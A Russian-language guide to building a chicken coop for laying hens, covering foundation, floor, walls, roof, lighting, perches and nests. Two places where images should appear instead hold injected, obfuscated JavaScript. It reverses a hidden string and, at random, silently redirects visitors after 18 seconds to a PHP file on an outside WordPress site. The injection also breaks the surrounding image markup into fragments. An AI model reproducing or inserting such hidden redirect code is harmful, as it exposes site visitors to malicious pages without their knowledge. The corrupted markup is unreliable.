Курятники — 7 аспектов самостоятельного возведения строения на своем участке
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom-tselogo-ryada-norm-i-600×450.jpg» alt=»Курятник строится с учетом целого ряда норм и требований» width=»600″ height=»450″ /> Курятник строится с учетом целого ряда норм и требований
Хотите завести кур-несушек, но понятия не имеете, как правильно оборудуются курятники? Я расскажу вам про 7 аспектов, которые вы должны знать при строительстве. Используя рекомендации, вы без труда сделаете курятник из любого материала и создадите идеальные условия для содержания птицы.
Для строительства можно использовать разные материалы, главное — учесть все требования по обустройству строения, внешний вид особого значения не имеет
Важные нюансы строительства и их описание
Мы разберем семь составляющих, учитывая которые вы сможете сделать курятник, пригодный для кур-несушек:
Фундамент;
Пол;
Стены;
Крыша;
Окна и освещение;
Насест;
Гнезда.
Вначале нужно сделать проект будущего строения, где необходимо учитывать несколько показателей:
Площадь помещения. На квадратный метр птичника должно приходиться не более трех куриц, в идеале их должно быть две. Минимальная площадь должна быть не меньше 3 м кв.;
Площадь участка для выгула. Если вы будете огораживать площадку, то на одну птицу должен приходиться как минимум один квадратный метр.
Минимальная площадь помещения для содержания 10 кур — 3 квадратных метра, а площадь выгула — 10 и более квадратов.
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovye-proekty-a-mozhete-sd.jpg» alt=»Вы можете использовать готовые проекты, а можете сделать собственный эскиз, главное — чтобы размеры курятника были достаточными для того количества кур, которые вы планируете завести» width=»580″ height=»440″ /> Вы можете использовать готовые проекты, а можете сделать собственный эскиз, главное — чтобы размеры курятника были достаточными для того количества кур, которые вы планируете завести
Аспект №1 — фундамент
Фундамент для курятника может быть следующим:
Иллюстрация
Описание
Столбчатый фундамент. Может быть двух типов:
Из бетонных блоков, устанавливаемых на нужном расстоянии и заглубленных в почву не менее чем на 50 см;
Из бетона. В этом случае сооружается опалубка, внутрь ставится арматура для укрепления.
При сооружении столбчатого фундамента опоры ставятся на расстоянии 100-150 см.
Ленточный фундамент. Более прочный вариант, используемый для строений из тяжелых материалов — блоков, кирпича или бруса.
Если строение будет иметь большой вес, то основание должно быть заглублено ниже точки промерзания почвы.
Для конструкций с небольшой массой можно сделать и мелкозаглубленный фундамент.
Плитный фундамент. Очень прочный вариант, который сооружается так:
Размечается площадка и снимается грунт на глубину 40-50 см;
Насыпается слой песка толщиной 5 см;
Засыпается слой щебня толщиной 20-30 см;
Укладывается армирующая сетка и заливается стяжка толщиной 5-10 см.
Вариант без фундамента. Если вес курятника будет небольшим, то можно и не делать капитальное основание, а обойтись бетонными блоками, которые укладываются по периметру конструкции.
Для защиты пространства по всей длине стен в землю на глубину 30 см вкапывается и укладывается сетка или металлический лист.
Аспект №2 — пол
Пол курятника можно делать по-разному:
Иллюстрация
Описание
Грунтовый пол. Самый простой и дешевый вариант: просто утрамбовывается грунт и застилается соломой или опилками. Я советую рассматривать этот вид основания как временный, так как куры разгребают землю, и придется постоянно ровнять пол.
Деревянный пол. Отличается дешевизной и простотой устройства. Подойдет любая обрезная доска толщиной 20 мм и более. Главный минус – недолговечность, от сырости древесина со временем начинает загнивать, поэтому настил придется менять раз в 5-7 лет.
Пол из влагостойкой фанеры. Современное решение, отличающееся неплохой надежностью. Для настила используйте листы толщиной не менее 18 мм.
Бетонный пол. Самый прочный и долговечный вариант. Заливается слой толщиной от 50 мм, проще всего выравнивать поверхность по заранее выставленным маякам.
Любой тип пола кроме грунтового нуждается в утеплении. Для этих целей можно использовать недорогие материалы – керамзит, пенопласт или насыпной полистирол.
Аспект №3 — стены
Курятник для кур-несушек своими руками может быть сооружен из следующих материалов:
Иллюстрация
Описание
Щитовая конструкция. Отличается простотой сооружения и высокой скоростью проведения работ. Внутрь каркаса закладывается утеплитель, а наружные поверхности обшиваются влагостойкими плитами ОСП.
Деревянные сооружения. Напоминают вышеописанный вариант, но делаются из досок, а изнутри утепляются минватой или дранкой, которая штукатурится смесью глины и соломы. Цена этого вариант самая низкая, но и теплоизоляционные показатели оставляют желать лучшего.
Бревно или брус. Традиционные варианты, использовавшиеся еще пару веков назад. Тут самое главное — качественно утеплить стыки, для этого можно использовать и мох, для птицы этот вариант даже лучше.
Газосиликатные или газобетонные блоки. Хороший вариант с точки зрения теплоизоляции, построить курятник можно за пару дней.
Кирпич. Самый основательный и долговечный, но и самый дорогой вариант. Работу лучше поручить каменщику, так как без опыта сделать кладку сложно.
При сооружении стен предусмотрите систему вентиляции – два проема снизу и сверху на противоположных стенах, закрывающиеся задвижками.
Аспект №4 — крыша
Рассматривая вопрос, как сделать курятник своими руками, нельзя не упомянуть крышу. Лучше всего делать классическую двухскатную конструкцию, она эффективно отводит осадки и позволяет увеличить внутреннее пространство помещения. Вы можете выбрать один из следующих вариантов:
Иллюстрация
Описание
Рубероид. Самое простое решение, которое предполагает устройство сплошного настила из досок или листов ОСП и укладку рулонного материала.
Рубероид фиксируется длинными рейками, которые прибиваются на стыках. Срок службы такого покрытия – около пяти лет.
Крыша из шифера. Еще один бюджетный вариант, который в отличие от предыдущего имеет большой срок службы – 20 и более лет. Единственный минус – не очень привлекательный внешний вид.
Профнастил или металлочерепица. Современные решения, которые и выглядят хорошо, и служат долго. Их плюс в том, что вы можете заказать листы нужного размера, даже если у вас односкатная крыша как на фото, и длина элементов получается большой.
Гибкая черепица. Отличное решение, которое и выглядит хорошо, и в монтаже не вызовет затруднений даже у малоопытных мастеров.
Аспект №5 — окна и освещение
Важная часть работ по той простой причине, что курам для максимальной яйценоскости нужно обеспечивать длину светового дня не менее 15 часов. Поэтому строительство курятника производится с соблюдением нескольких простых правил:
Площадь окон. Должна быть не менее 1/12 от площади пола. Чем больше окна – тем лучше будет естественное освещение;
Расположение проемов. Идеально располагать окна с южной стороны, в крайнем случае можно располагать проемы и со стороны востока;
Материал изготовления. Чаще всего ставятся рамы из дерева, они стоят недорого и служат долго. Но при желании можно использовать и вариант из металлопластика;
Деревянные окна отлично подходят для курятников
Конструкция окон. Они должны открываться для проветривания в летний период и иметь сетку для защиты от насекомых и мелких хищников.
Курятник должен освещаться 16 часов в сутки, если световой день короткий, используется искусственное освещение. Мощность ламп выбирается так, чтобы на квадратный метр приходилось не менее 5 Вт.
Освещение курятника – очень важный аспект
Аспект №6 — насест
Очень важная часть конструкции, так как на насесте курица проводит половину своей жизни. Обустраивая конструкцию нужно помнить следующее:
Иллюстрация
Описание
Используется деревянный брусок. Оптимальное сечение 50х50 мм. Чтобы птице было удобно располагаться, углы скругляются рубанком или другим приспособлением.
Насест располагается на высоте 50 см от пола. Это оптимальное расположение, позволяющее птице легко забираться и слезать.
Важно соблюдение правильного расстояния между жердями. Если у вас будет ставиться два и более бруса, то располагайте их на расстоянии 35 см друг от друга. От крайнего элемента до стены должно быть не менее 25 см.
Возможно сооружение углового насеста. Это экономит место и позволяет курам легко забираться наверх.
Что касается размеров, то на одну несушку должно приходиться как минимум 25 см насеста. То есть если вы делаете помещение на 20 кур, то суммарная длина бруска должна быть не менее 5 метров.
Аспект №7 — гнезда
Для несения яиц курам нужно оборудовать гнезда. Для этого сооружаются ящики размером 30х40 см и глубиной 30 см.
Материалом изготовления может служить как обычная доска, так и фанера или плита ОСП. Вы можете делать одинарные, двойные или даже тройные ящики.
Ящики могут располагаться на опорах
При расположении гнезд в два ряда минимальная высота отсека должна быть не менее 30 см.
Важно обеспечить удобство расположения несушек
В качестве подстилки используются опилки или солома. Располагать гнезда нужно в затемненной части курятника.
Вывод
Вы узнали, каким требованиям должны соответствовать курятники. Используя обзор, выберите оптимальное решение для каждой части конструкции. Видео подскажет дополнительную информацию по теме, если вам что-то непонятно – спрашивайте в комментариях.
Понравилась статья? Подписывайтесь на наш канал Яндекс.Дзен
Оставить комментарий
ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней
Оставить комментарий
Оставляя комментарий, Вы принимаете пользовательское соглашение